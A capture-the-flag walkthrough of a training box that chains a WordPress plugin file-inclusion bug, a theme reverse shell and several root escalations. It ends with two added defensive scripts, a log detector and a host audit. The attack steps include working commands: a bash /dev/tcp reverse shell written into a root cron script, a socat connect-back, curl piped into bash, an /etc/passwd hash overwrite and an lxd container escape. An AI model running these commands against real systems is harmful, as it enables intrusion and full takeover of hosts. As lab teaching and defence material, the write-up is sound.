This does not use the full path for cp, which means it is vulnerable to a PATH variable privilege escalation. system() resolves a bare command name through the PATH variable, which on Linux normally points at directories such as /bin, /usr/bin and /sbin. However, we can prepend our own directory to PATH and place our own cp there, so that when we execute this file it runs the cp located in our path.

To start, we must craft a file named cp. I did this under the /tmp directory

archangel@ubuntu:/tmp$ echo "/bin/bash" > cp
archangel@ubuntu:/tmp$ chmod 777 cp

Now, I need to change my PATH variable to /tmp

archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH

With my PATH changed, when I execute backup it looks for cp in /tmp and executes my file. Since the binary is setuid and owned by root, my cp runs as root

archangel@ubuntu:/tmp$ ~/secret/backup 
root@ubuntu:/tmp# 

As root, I can now read the final flag


thm-allinonemj-public

All in One is an easy Linux box on TryHackMe.

Enumeration


Starting off with an nmap scan, I find ports 21, 22 and 80 open

root@kali:~/tryhackme/allinone# nmap -sC -sV 10.10.166.147
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan  
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)  
Nmap scan report for 10.10.166.147                             
Host is up (0.22s latency).                                         
Not shown: 997 closed ports                                        
PORT   STATE SERVICE VERSION                                       
21/tcp open  ftp     vsftpd 3.0.3                                    
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)            
| ftp-syst:                                                   
|   STAT:                                                           
| FTP server status:                                             
|      Connected to ::ffff:10.2.8.75                               
|      Logged in as ftp                                               
|      TYPE: ASCII                                                     
|      No session bandwidth limit                                    
|      Session timeout in seconds is 300                                
|      Control connection is plain text                               
|      Data connections will be plain text                         
|      At session startup, client count was 4                           
|      vsFTPd 3.0.3 - secure, fast, stable                           
|_End of status                                                          
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                           
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)           
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)               
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)         
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                      
|_http-server-header: Apache/2.4.29 (Ubuntu)                           
|_http-title: Apache2 Ubuntu Default Page: It works                     
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel               
                                                                              
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds

FTP Enumeration

Since FTP allows anonymous access, I log in and start to poke around

root@kali:~/tryhackme/allinone# ftp 10.10.166.147

Connected to 10.10.166.147.                  
220 (vsFTPd 3.0.3)                          
Name (10.10.166.147:root): anonymous           
331 Please specify the password.            
Password:                               
230 Login successful.               
Remote system type is UNIX.    
Using binary mode to transfer files. 
 
ftp> dir -a                                                           
200 PORT command successful. Consider using PASV.      
150 Here comes the directory listing.                  
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .  
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .. 
226 Directory send OK. 

Nothing is located here, so I try to upload a file; however, I am not allowed to do that

ftp> put new                       
local: new remote: new                              
200 PORT command successful. Consider using PASV. 
553 Could not create file. 

HTTP Enumeration

Moving on to port 80, I run gobuster to look for directories. Here I find /wordpress

root@kali:~/tryhackme/allinone# gobuster dir -u 10.10.166.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.166.147
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html
[+] Timeout:        10s
===============================================================
2020/12/09 15:39:33 Starting gobuster
===============================================================
/index.html (Status: 200)
/wordpress (Status: 301)

Since /wordpress is open, I can run wpscan to gather more information

root@kali:~/tryhackme/allinone# wpscan --url 10.10.166.147/wordpress                                                                                                                                             
_______________________________________________________________                                         
         __          _______   _____                                                                    
         \ \        / /  __ \ / ____|                                                                   
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                  
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \      
            \  /\  /  | |     ____) | (__| (_| | | | |                        
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                  
                                                                                                        
         WordPress Security Scanner by the WPScan Team               
                         Version 3.7.6            
       Sponsored by Automattic - https://automattic.com/            
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart                       
_______________________________________________________________                
                                                                               
[i] It seems like you have not updated the database for some time.                
[?] Do you want to update now? [Y]es [N]o, default: [N]N                           
[+] URL: http://10.10.166.147/wordpress/                                            
[+] Started: Wed Dec  9 16:54:36 2020                                      
                                                    
Interesting Finding(s):                               

[+] http://10.10.166.147/wordpress/           
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)                                                    
 | Found By: Headers (Passive Detection)
 | Confidence: 100%                                                                                     
                                                    
[+] http://10.10.166.147/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%                                 
 | References:                      
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
                                                    
[+] http://10.10.166.147/wordpress/readme.html                                                          
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%                      
                                                    
[+] Upload directory has listing enabled: http://10.10.166.147/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%              
                                                                                                        
[+] http://10.10.166.147/wordpress/wp-cron.php                                                          
 | Found By: Direct Access (Aggressive Detection)                                                       
 | Confidence: 60%                                                                                      
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299                        
                                                    
[+] WordPress version 5.5.1 identified (Latest, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.166.147/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.166.147/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
                                                    
[+] WordPress theme in use: twentytwenty                                                                
 | Location: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/      
 | Latest Version: 1.5 (up to date)
 | Last Updated: 2020-08-11T00:00:00.000Z                                                               
 | Readme: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/readme.txt                                                                                                                              
 | Style URL: http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team                                                                                                                                                                                    
 | Author URI: https://wordpress.org/
 |                                    
 | Found By: Css Style In Homepage (Passive Detection)
 |                    
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2019-05-10T16:05:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.166.147/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:01 <====================================================================================================================================> (21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Dec  9 16:54:52 2020

Exploit


Mail-Masta Exploit

Since wpscan found a few plugins, I start looking for exploits for them. Looking at mail-masta, I find one on exploit-db.

etcpasswd

Looking through this exploit, I find that /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd works, as I can view the file.

etcpasswd

Since this is working properly, I need to find a file to read that will give me useful information. I find a Medium article detailing how to extract the wp-config file by having PHP base64-encode it first, so that the PHP code is returned as text instead of being executed. To do this, I just need to change the link to /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

base64

This outputs a large base64 value. I take this value and put it in a file named wp-config. I then base64-decode it to properly read the file.

root@kali:~/tryhackme/allinone# cat wp-config | base64 -d

.......................................................

/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', '*******************' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

.......................................................
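From the defender's side, the two requests above leave a very recognisable trace in the web server's access log. The following detection script is an added example, not part of the original writeup: it reads Apache combined-format lines and flags hits on the mail-masta count_of_send.php endpoint whose pl= parameter names a php:// stream wrapper, a traversal sequence or an absolute system path. The log lines, client addresses and response sizes are constructed samples.

```shell
#!/bin/bash
# Added detection example, not from the original writeup. Flags requests to
# the mail-masta count_of_send.php endpoint whose pl= parameter names a
# php:// stream wrapper, a traversal sequence or an absolute system path,
# the LFI pattern used above. The log lines are constructed samples.

# Percent-decode a URL fragment (bash: %XX -> the byte it encodes).
urldecode() {
    local s="${1//+/ }"
    printf '%b' "${s//%/\\x}"
}

# Read Apache combined-format lines on stdin; print "client decoded-pl"
# for every request that matches the LFI pattern.
flag_lfi_requests() {
    local client path pl
    while read -r client _ _ _ _ _ path _; do
        case "$path" in
            */mail-masta/inc/campaign/count_of_send.php\?*pl=*) ;;
            *) continue ;;
        esac
        pl="${path##*pl=}"        # value after the (last) pl=
        pl="${pl%%&*}"            # drop any following parameters
        pl=$(urldecode "$pl")
        case "$pl" in
            php://*|*../*|/etc/*|/proc/*|/var/*) echo "$client $pl" ;;
        esac
    done
}

# Constructed access-log sample: the two hits from the walkthrough above,
# one benign feed request, and a percent-encoded variant of the first hit.
SAMPLE_LOG='10.2.8.75 - - [09/Dec/2020:16:58:01 +0000] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 2371 "-" "Mozilla/5.0"
10.2.8.75 - - [09/Dec/2020:17:01:12 +0000] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php HTTP/1.1" 200 4260 "-" "Mozilla/5.0"
10.10.166.1 - - [09/Dec/2020:17:02:40 +0000] "GET /wordpress/index.php/feed/ HTTP/1.1" 200 7712 "-" "Mozilla/5.0"
10.10.166.1 - - [09/Dec/2020:17:03:05 +0000] "GET /wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=%2Fetc%2Fpasswd HTTP/1.1" 200 2371 "-" "curl/7.68.0"'

# Run the detector over the constructed sample.
scan_sample() {
    printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests
}

scan_sample
```

Against a real server, feed the access log on stdin instead of the sample (cat /var/log/apache2/access.log | flag_lfi_requests); the percent-encoded line shows why decoding before matching matters.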

WordPress Reverse Shell

With this password, I can log in to the WordPress site. Once logged in, I navigate to Appearance > Theme Editor. I then select 404 Template (404.php) and replace its contents with a PHP reverse shell. If you wish to read up more on how to gain a reverse shell on WordPress, I recommend checking out this article by Hacking Articles.

theme

Once I finish editing this file, I save it and set up a netcat listener. Once my listener is running, I navigate to /wp-content/themes/twentytwenty/404.php to gain a reverse shell.

root@kali:~/tryhackme/allinone# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 59480
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 22:59:22 up  2:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation as www-data


Before running any scans, I want to use python3 to upgrade the shell to a proper TTY.

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.4$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/allinone# stty raw -echo
root@kali:~/tryhackme/allinone# fg

bash-4.4$ 

I then run LinEnum.sh and find several ways to escalate my privileges straight to root.

bash-4.4$ curl 10.2.8.75/LinEnum.sh | bash 

SUID

Looking at the SUID section of LinEnum, it immediately points out 3 known exploitable SUID binaries. I will be using GTFOBins to exploit these.

suid

Starting off with bash, I can look on GTFOBins to find the correct syntax to exploit it.

bash-4.4$ bash -p
bash-4.4# 

Looking at chmod on GTFOBins, I find that it will not drop me a shell, but it does let me change the permissions on any file. You could make root.txt and user.txt readable, but I want to gain root access. I instead make /etc/passwd writable so I can insert my own password hash.

bash-4.4# chmod 0777 /etc/passwd
bash-4.4# ls -la /etc/passwd
-rwxrwxrwx 1 root root 1672 Oct  6 11:57 /etc/passwd

I need to generate a password hash with openssl to insert into /etc/passwd.

root@kali:~/tryhackme/allinone# openssl passwd -1 -salt root password
$1$root$1fvaXuILgb4rdRlHdQ80N/

Now edit the file and replace the x next to root with the new hash.

bash-4.4$ vi /etc/passwd

root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash

After saving this, I can log in as root using password as the password.

bash-4.4$ su root       
Password: 
root@elyana:/# 

Cronjob

Looking at the cron jobs, I find that root is running one out of /var/backups/script.sh.

cron

Navigating there, I see that the script is world-writable, so I am allowed to edit it.

bash-4.4$ ls -la
total 52
drwxr-xr-x  2 root root  4096 Oct  7 13:41 .
drwxr-xr-x 14 root root  4096 Oct  5 19:43 ..
-rw-r--r--  1 root root 32890 Oct  6 11:57 apt.extended_states.0
-rw-r--r--  1 root root  3570 Oct  5 21:07 apt.extended_states.1.gz
-rwxrwxrwx  1 root root    73 Oct  7 13:37 script.sh

Since I am allowed to edit the file, I insert a bash reverse shell from Pentest Monkey.

echo '#!/bin/bash' > script.sh
echo 'bash -i >& /dev/tcp/10.9.2.255/9002 0>&1' >> script.sh

With this edited, I set up a netcat listener and wait for a few moments. I then receive a connection and a root shell.

root@kali:~/tryhackme/allinone# nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.147] 58036
bash: cannot set terminal process group (19460): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# 

Elevating to elyana


Moving backwards, I will work as www-data and try to elevate to elyana.

Reading the hint.txt file on elyana's desktop, I find that the password for this user is stored somewhere on the system.

bash-4.4$ cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

I start looking around for anything that is useful. Searching for files owned by elyana, I find an interesting result under /etc/.

find / -user elyana -type f 2>/dev/null

This looks promising, so I read the file and find credentials.

bash-4.4$ cat /etc/mysql/conf.d/private.txt
user: elyana
password: *********

Another way of finding this file is to run linpeas.

pass

Testing this password, I can log in as elyana.

bash-4.4$ su elyana
Password: 
bash-4.4$ whoami
elyana

Privilege Escalation as elyana


As with www-data, there are several ways to elevate to root as elyana. I will outline a few methods here. I rerun LinEnum.sh to help find them.

Sudo

The first thing I do is run sudo -l to see which commands I am allowed to run with sudo. Here, I find I can run socat as root without a password.

bash-4.4$ sudo -l
Matching Defaults entries for elyana on elyana:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User elyana may run the following commands on elyana:
    (ALL) NOPASSWD: /usr/bin/socat

Looking on GTFOBins, I see an easy way to escalate to root. Running this command gives me root access.

bash-4.4$ sudo socat stdin exec:/bin/sh
whoami
root

Alternatively, use the following and catch the connection with a netcat listener:

sudo socat tcp-connect:10.9.2.255:9001 exec:bash,pty,stderr,setsid,sigint,sane

lxd

Looking at LinEnum, I find that elyana is a member of the lxd group.

lxd

This is a popular exploit, and I will be following this guide to do so.

First, I clone the Alpine image builder and build the image on my local machine.

root@kali:~/tryhackme/allinone# git clone  https://github.com/saghul/lxd-alpine-builder.git

Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 31 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (31/31), done.

root@kali:~/tryhackme/allinone# cd lxd-alpine-builder/

root@kali:~/tryhackme/allinone/lxd-alpine-builder# ./build-alpine 

Determining the latest release... v3.12
..................................................................................
OK: 8 MiB in 19 packages

Once this is done building, I upload the image to the machine and import it.

bash-4.4$ wget 10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
--2020-12-10 02:23:07--  http://10.2.8.75/alpine-v3.12-x86_64-20201209_2120.tar.gz
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3199386 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’

alpine-v3.12-x86_64 100%[===================>]   3.05M   321KB/s    in 16s     

2020-12-10 02:23:24 (190 KB/s) - ‘alpine-v3.12-x86_64-20201209_2120.tar.gz’ saved [3199386/3199386]

lxc image import ./alpine-v3.12-x86_64-20201209_2120.tar.gz --alias myimage

I want to double-check that it has been imported properly.

bash-4.4$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | fa664dd4e321 | no     | alpine v3.12 (20201209_21:20) | x86_64 | 3.05MB | Dec 10, 2020 at 2:23am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

The image imported properly, so I can now create a privileged container from it, mount the host's root filesystem into it, and execute a shell inside it to gain root access.

bash-4.4$ lxc init myimage ignite -c security.privileged=true
Creating ignite

bash-4.4$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite

bash-4.4$ lxc start ignite

bash-4.4$ lxc exec ignite /bin/sh

~ # whoami
root
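Each of the three root paths above (the hash inlined into /etc/passwd, the world-writable script run from root's crontab, and membership in the lxd group) is visible to a quick host audit. The script below is an added example, not part of the original writeup or of LinEnum: it takes passwd-, group- and crontab-format files as arguments so it can be run against the constructed fixture it builds, or against the real /etc files on a box being hardened.

```shell
#!/bin/bash
# Added audit helper, not part of the original writeup. Checks a host for the
# three misconfigurations abused above (inline hash in /etc/passwd, writable
# cron script, lxd group membership). File paths are passed in so it can run
# on a constructed fixture as well as on the real /etc files.

# Print users whose passwd password field holds a hash instead of the
# usual 'x' (hash lives in shadow), '*' or '!' (account locked) marker.
passwd_inline_hashes() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "" {print $1}' "$1"
}

# Print members of the lxd group from an /etc/group-format file.
lxd_members() {
    awk -F: '$1 == "lxd" {print $4}' "$1" | tr ',' '\n' | sed '/^$/d'
}

# Print scripts named in a system crontab (m h dom mon dow user command)
# that are world-writable, i.e. editable by any user but run as the
# crontab's user.
cron_writable_scripts() {
    awk '$1 !~ /^#/ && NF >= 7 {print $7}' "$1" | sort -u |
    while read -r script; do
        if [ -f "$script" ]; then find "$script" -perm -002 -print; fi
    done
}

# Constructed fixture mirroring the state reached above; prints its path.
make_fixture() {
    local d
    d=$(mktemp -d)
    printf 'root:$1$root$1fvaXuILgb4rdRlHdQ80N/:0:0:root:/root:/bin/bash\n' > "$d/passwd"
    printf 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n' >> "$d/passwd"
    printf 'elyana:x:1000:1000::/home/elyana:/bin/bash\n' >> "$d/passwd"
    printf 'lxd:x:108:elyana\nsudo:x:27:\n' > "$d/group"
    printf '#!/bin/bash\n' > "$d/script.sh"
    chmod 777 "$d/script.sh"
    printf '* * * * * root %s\n' "$d/script.sh" > "$d/crontab"
    echo "$d"
}

# Audit a live host: ./audit.sh /etc/passwd /etc/group /etc/crontab
if [ "$#" -eq 3 ]; then
    passwd_inline_hashes "$1"; lxd_members "$2"; cron_writable_scripts "$3"
fi
```

On a healthy host all three functions print nothing; any output names the account, group member or script that needs attention.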

Finally, user.txt and root.txt are base64-encoded; go ahead and decode them, and submit your flags 🚩🚩!

This was a fun box, to be honest, and it covers some of the most important techniques for exploiting a system.
